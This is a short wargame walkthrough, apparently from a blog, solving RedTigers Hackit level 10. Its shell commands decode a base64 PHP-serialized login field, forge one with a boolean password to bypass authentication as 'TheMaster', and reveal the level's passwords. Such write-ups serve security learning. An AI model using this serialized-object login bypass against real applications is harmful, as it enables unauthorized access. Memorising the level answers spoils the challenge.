# RedTigers Hackit wargame: Level 10


# curl --silent --insecure --cookie-jar level10 --cookie level10 --request POST --data "password=646f6e745f7468726f775f73746f6e6573&level10login=Login" https://redtiger.dyndns.org/hackit/level10.php
                <b>Welcome to Level 10</b><br><br>
                Target: Bypass the login. Login as TheMaster<br>
                <br><br><br>
                <form method="post">
                        <input type="hidden" name='login' value="YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9">
                        <input type="submit" value="Login" name="dologin">
                </form>
                <br><br><br>
# echo -n "YToyOntzOjg6InVzZXJuYW1lIjtzOjY6Ik1vbmtleSI7czo4OiJwYXNzd29yZCI7czoxMjoiMDgxNXBhc3N3b3JkIjt9" | base64 -d; echo
a:2:{s:8:"username";s:6:"Monkey";s:8:"password";s:12:"0815password";}
# echo -n 'a:2:{s:8:"username";s:9:"TheMaster";s:8:"password";b:1;}' | base64
YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=
# curl --silent --insecure --cookie level10 --request POST --data "login=YToyOntzOjg6InVzZXJuYW1lIjtzOjk6IlRoZU1hc3RlciI7czo4OiJwYXNzd29yZCI7YjoxO30=&dologin=Login" https://redtiger.dyndns.org/hackit/level10.php | grep is:
<br><br>The password for the hall of fame is: <b>796f75536c76645465684861636b6974477261747a</b> <br><br>

1 comment:

Amone said...

Where did b:1 come from?